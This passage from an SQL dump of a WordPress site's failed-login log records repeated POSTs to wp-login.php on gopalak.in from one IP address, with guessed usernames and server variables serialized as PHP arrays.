PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983358.6645191;s:12:\"REQUEST_TIME\";i:1746983358;}}','13.233.245.36',1,'2025-05-11 22:39:20','2025-05-12 23:29:05'),(95542,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983358.6668701;s:12:\"REQUEST_TIME\";i:1746983358;}}','13.233.245.36',1,'2025-05-11 22:39:20','2025-05-12 23:29:05'),(95543,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"127\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"127\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983358.665323;s:12:\"REQUEST_TIME\";i:1746983358;}}','13.233.245.36',1,'2025-05-11 22:39:20','2025-05-12 23:29:05'),(95544,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"131\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"131\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983358.6579361;s:12:\"REQUEST_TIME\";i:1746983358;}}','13.233.245.36',1,'2025-05-11 22:39:20','2025-05-12 23:29:05'),(95545,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983360.496155;s:12:\"REQUEST_TIME\";i:1746983360;}}','13.233.245.36',1,'2025-05-11 22:39:22','2025-05-12 23:29:05'),(95546,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983721.51302;s:12:\"REQUEST_TIME\";i:1746983721;}}','13.233.245.36',1,'2025-05-11 22:45:23','2025-05-12 23:29:05'),(95547,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983721.5105269;s:12:\"REQUEST_TIME\";i:1746983721;}}','13.233.245.36',1,'2025-05-11 22:45:23','2025-05-12 23:29:05'),(95548,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983721.515197;s:12:\"REQUEST_TIME\";i:1746983721;}}','13.233.245.36',1,'2025-05-11 22:45:23','2025-05-12 23:29:05'),(95549,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983721.512213;s:12:\"REQUEST_TIME\";i:1746983721;}}','13.233.245.36',1,'2025-05-11 22:45:23','2025-05-12 23:29:05'),(95550,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983723.3713291;s:12:\"REQUEST_TIME\";i:1746983723;}}','13.233.245.36',1,'2025-05-11 22:45:25','2025-05-12 23:29:05'),(95551,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984089.077692;s:12:\"REQUEST_TIME\";i:1746984089;}}','13.233.245.36',1,'2025-05-11 22:51:31','2025-05-12 23:29:05'),(95552,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST